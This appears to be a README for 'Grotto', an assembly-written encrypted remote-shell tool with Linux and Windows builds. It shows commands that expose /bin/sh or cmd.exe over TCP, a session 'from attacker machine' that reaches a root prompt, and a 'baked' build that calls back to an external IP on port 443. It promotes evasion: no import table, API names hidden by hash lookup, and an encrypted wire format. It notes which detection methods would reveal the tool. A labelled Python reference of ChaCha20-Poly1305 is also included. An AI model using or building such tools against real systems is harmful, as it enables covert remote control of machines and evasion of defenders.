ChaCha20-Poly1305 AEAD encryption over TCP. Cross-platform Linux and Windows binaries in pure x86_64 NASM. Zero dependencies, zero imports, ~8 KB on disk.
```console
# Generate 256-bit pre-shared key
$ KEY=$(python3 -c "import secrets; print(secrets.token_hex(32))")

# Listener with encrypted shell relay
$ ./grotto -l -p 4444 -k $KEY -e /bin/sh
[*] listening on 0.0.0.0:4444
[*] connection from 10.10.14.3
[*] shell relay active — encrypted bidirectional

# Connect from attacker machine
$ ./grotto -c 10.10.10.5 -p 4444 -k $KEY
id
uid=0(root) gid=0(root)
```
Full AEAD encryption, cross-platform assembly, shell relay, and zero dependencies in under 13 KB.
Full RFC 8439 ChaCha20-Poly1305 in pure x86_64 assembly. 256-bit pre-shared key, random 12-byte nonce per message, authenticated ciphertext. Tampered payloads silently rejected.
Linux ELF (~13 KB) and Windows PE (~8 KB) from shared crypto core. Same wire protocol — full interoperability between platforms.
All Windows APIs resolved at runtime via PEB walk and ror13 hash matching. No import table, no API name strings — 25 functions across kernel32, ws2_32, advapi32.
Linux binary uses direct syscall instructions. No libc, no dynamic linking, fully static ELF. Socket, bind, connect, poll — all via kernel interface.
Spawn cmd.exe or /bin/sh with stdin/stdout piped through the AEAD channel. Full bidirectional relay — every keystroke and response authenticated and encrypted.
Windows uses CreateThread with WaitForMultipleObjects for concurrent relay. Linux uses poll(2) for single-threaded multiplexed I/O.
Standard netcat-style modes. Listen for inbound connections or connect out to a target. Bidirectional encrypted relay on every byte.
Every byte hand-written in NASM. No compiler, no runtime, no dependencies.
Shared crypto core with platform-specific networking and I/O. ~3,800 lines of handwritten x86_64 NASM.
ChaCha20 quarter-round, block generation, stream XOR. Poly1305 mod 2^130-5 with 128-bit partial products. AEAD envelope per RFC 8439 Section 2.8. Shared between both platforms via .inc includes.
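The RFC 8439 construction described above (the AEAD feature and the shared crypto core), as an added Python reference rather than Grotto's own assembly: the ChaCha20 quarter-round and block function, stream XOR from block counter 1, Poly1305 modulo 2^130-5, the section 2.8 envelope with a random 12-byte nonce per message, and a constant-time tag check that rejects a tampered record before any plaintext is released. The per-message framing used at the end (nonce || ciphertext || tag with empty AAD) is an assumption for illustration, not the project's documented wire format.

```python
import hmac, os, struct
MASK32 = 0xFFFFFFFF
P1305 = (1 << 130) - 5  # Poly1305 works modulo the prime 2^130 - 5
def _rotl(v, n): return ((v << n) | (v >> (32 - n))) & MASK32
def _qr(s, a, b, c, d):  # ChaCha20 quarter-round, RFC 8439 section 2.1
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 7)

def chacha20_block(key, counter, nonce):  # one 64-byte keystream block, section 2.3
    init = list(struct.unpack("<16I", b"expand 32-byte k" + key + struct.pack("<I", counter) + nonce))
    w = init[:]
    for _ in range(10):  # 20 rounds as 10 column + diagonal double-rounds
        _qr(w, 0, 4, 8, 12); _qr(w, 1, 5, 9, 13); _qr(w, 2, 6, 10, 14); _qr(w, 3, 7, 11, 15)
        _qr(w, 0, 5, 10, 15); _qr(w, 1, 6, 11, 12); _qr(w, 2, 7, 8, 13); _qr(w, 3, 4, 9, 14)
    return struct.pack("<16I", *[(x + y) & MASK32 for x, y in zip(w, init)])

def chacha20_xor(key, nonce, data, counter=1):  # stream XOR; block 0 is reserved for the MAC key
    out = bytearray()
    for i in range(0, len(data), 64):
        out += bytes(a ^ b for a, b in zip(data[i:i + 64], chacha20_block(key, counter + i // 64, nonce)))
    return bytes(out)

def poly1305_mac(key, msg):  # one-time MAC over 16-byte blocks, section 2.5
    r = int.from_bytes(key[:16], "little") & 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF  # clamp r
    s, acc = int.from_bytes(key[16:], "little"), 0
    for i in range(0, len(msg), 16):  # a 0x01 byte is appended to every block, short last block included
        acc = ((acc + int.from_bytes(msg[i:i + 16] + b"\x01", "little")) * r) % P1305
    return ((acc + s) & ((1 << 128) - 1)).to_bytes(16, "little")

def _mac_input(aad, ct):  # pad16(aad) || pad16(ct) || len(aad) || len(ct) as LE u64, section 2.8
    pad = lambda b: b + b"\x00" * (-len(b) % 16)
    return pad(aad) + pad(ct) + struct.pack("<QQ", len(aad), len(ct))

def aead_seal(key, nonce, aad, plaintext):  # returns ciphertext || 16-byte tag
    ct = chacha20_xor(key, nonce, plaintext)
    return ct + poly1305_mac(chacha20_block(key, 0, nonce)[:32], _mac_input(aad, ct))

def aead_open(key, nonce, aad, sealed):  # None on any tamper; the tag is verified before decrypting
    ct, tag = sealed[:-16], sealed[-16:]
    if not hmac.compare_digest(poly1305_mac(chacha20_block(key, 0, nonce)[:32], _mac_input(aad, ct)), tag):
        return None
    return chacha20_xor(key, nonce, ct)

def seal_message(key, plaintext):  # assumed framing: fresh random 12-byte nonce || ct || tag, empty AAD
    nonce = os.urandom(12); return nonce + aead_seal(key, nonce, b"", plaintext)

def open_message(key, record):  # counterpart for the assumed framing above
    return aead_open(key, record[:12], b"", record[12:])
```

The RFC 8439 test vectors in sections 2.5.2 and 2.8.2 exercise `poly1305_mac` and `aead_seal` directly; flipping a single bit of a sealed record makes `open_message` return None.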
Linux: raw socket/bind/accept/connect syscalls. Windows: Winsock2 via PEB-resolved ws2_32.dll. Both support listen and connect modes with identical wire protocol.
Linux: poll(2) event loop multiplexing socket and stdin/pipe. Windows: CreateThread with dual worker threads and WaitForMultipleObjects for concurrent bidirectional relay.
Linux: fork/execve/dup2 with pipe redirection. Windows: CreateProcessA with STARTUPINFO pipe handles. Both pipe shell I/O through the AEAD channel.
NASM assembler + platform linker. Both targets build in under a second.
```console
$ git clone https://github.com/Real-Fruit-Snacks/Grotto.git
$ cd Grotto && make all

# Or use the build script (generates random PSK)
$ ./build.sh

$ ls -la build/
grotto      13288  (Linux ELF)
grotto.exe   8192  (Windows PE)
```
```console
# Encrypted listener with shell
$ ./grotto -l -p 4444 -k $KEY -e /bin/sh

# Connect to encrypted listener
$ ./grotto -c 10.10.10.5 -p 4444 -k $KEY

# Pipe data through encrypted channel
$ echo "secret" | ./grotto -c host -p 4444 -k $KEY

# Baked build — zero CLI arguments
$ ./build.sh --baked -c 10.10.14.1 -p 443 -e cmd.exe
```
- strings — no API names, encrypted wire format
- strace, eBPF — syscall tracing reveals behavior